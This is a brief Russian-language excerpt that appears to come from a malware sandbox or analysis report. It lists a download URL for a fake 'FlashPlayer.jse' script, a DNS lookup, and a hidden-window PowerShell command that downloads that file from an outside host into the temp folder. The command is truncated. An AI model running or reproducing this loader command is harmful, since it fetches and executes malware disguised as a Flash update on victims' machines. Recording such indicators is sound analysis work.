Техническая информация
- http+s://yaighhillsclerk.com/3181175471934/1481681248127145/flashplayer.jse как $d
- DNS ASK ya####illsclerk.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1595318106806.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://yaighhillsclerk.com/3181175471934/1481681248127145/FlashPlayer.jse'...' (со скрытым окном)